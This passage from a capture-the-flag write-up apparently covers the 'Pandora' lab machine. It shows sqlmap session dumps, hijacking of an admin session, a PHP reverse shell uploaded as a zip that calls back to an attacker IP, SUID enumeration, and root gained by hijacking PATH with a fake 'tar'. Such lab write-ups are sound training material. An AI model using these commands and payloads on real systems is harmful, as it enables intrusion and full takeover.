| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                            | 1638168492  |
| j2bo9tvhgn1e6sb5u03p8101hc | NULL                                                | 1648661270  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                            | 1638456173  |
| koihrjg9bqn35hjos4mdrdmie7 | id_usuario|s:6:"daniel";                            | 1648660800  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                | 1638787808  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                            | 1638540482  |
| oc1um2oum4n98a6d7fku241r56 | NULL                                                | 1648660640  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                            | 1637667827  |
| pjigpi88mlmmkllqfqh4ap2kmr | NULL                                                | 1648661225  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                            | 1638168416  |
| q9oqum7kba0n0pip0626gjluea | NULL                                                | 1648659478  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                            | 1638889082  |
| tg6ehatvu0t8dps35nod40ph1c | NULL                                                | 1648661158  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                            | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                            | 1638793297  |
| ur7c35ngmoai7gs36odft79f9j | NULL                                                | 1648661348  |
+----------------------------+-----------------------------------------------------+-------------+

[13:29:22] [INFO] table 'pandora.tsessions_php' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tsessions_php.csv'
[13:29:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'

[*] ending @ 13:29:22 /2022-03-30/

So we have session values for admin also

Other tables look like less interesting

Cracking the matt password hash did not work, seems like we have to move on with the session values

Image

After injecting the session of admin and reloading it displays a dashboard

Image

So we have done session hijacking for admin user

Since we are able to access Admin Tools in the dashboard, we can have RCE by uploading PHP reverse shell as zip which is mentioned in this exploit video

Using pentester monkey PHP reverse shell,

┌──(kaliaidenpearce369)-[~]
└─$ head shell.php         
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.5';  // CHANGE THIS
$port = 9876;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ zip shell.zip shell.php 
  adding: shell.php (deflated 60%)

After uploading this zip, try to load the file manager page to execute this shell

┌──(kaliaidenpearce369)-[~]
└─$ nc -nlvp 9876                   
listening on [any] 9876 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.136] 59936
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 17:51:13 up  2:56,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.14.5       16:16   12:56   0.18s  0.18s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off                                     
$whoami                                                
matt 
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ cd /home/matt
$ cat user.txt
<USER FLAG>

Escalating Privileges To Root

Listing the SUID binaries,

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

Its time to exploit /usr/bin/pandora_backup

Changing to interactive shell,

$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
matt@pandora:/home/matt$ ls
ls
user.txt

Copying the SUID binary to local machine,

matt@pandora:/home/matt$ cp /usr/bin/pandora_backup .
cp /usr/bin/pandora_backup .
matt@pandora:/home/matt$ ls
ls
pandora_backup  user.txt
matt@pandora:/home/matt$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.5 - - [30/Mar/2022 17:58:54] "GET /pandora_backup HTTP/1.1" 200 -

After using the strings on the binary, we can see its operation

┌──(kaliaidenpearce369)-[~]
└─$ strings pandora_backup                                                                                            

...

u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c

...

Inorder to exploit this, we need an elevated shell with no restriction, for that we can use /usr/bin/at SUID binary to bypass it,

Now we can confirm that we have an elevated shell,

matt@pandora:/$ ls /tmp
ls /tmp
matt@pandora:/$ 

    echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null


matt@pandora:/$ 
<(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 2 at Wed Mar 30 18:23:00 2022
/bin/sh: 0: can't access tty; job control turned off
$ $ ls /tmp
ls /tmp
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-apache2.service-g5jfnj
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-logind.service-r0r3ug
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-resolved.service-dpsyag
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-timesyncd.service-6opwTh
tmux-1001
vmware-root_697-3988163015

We can easily exploit this SUID binary to drop root shell, because the tar command used here does’nt use absolute path

Now crafting our malicious tar binary and abusing the $PATH variable,

$ cd /tmp
cd /tmp
$ echo "/bin/sh -p" >tar
echo "/bin/sh -p" >tar
$ chmod +x tar
chmod +x tar
$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/bin/sh: 0: can't access tty; job control turned off
# id
id
uid=0(root) gid=1000(matt) groups=1000(matt)
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>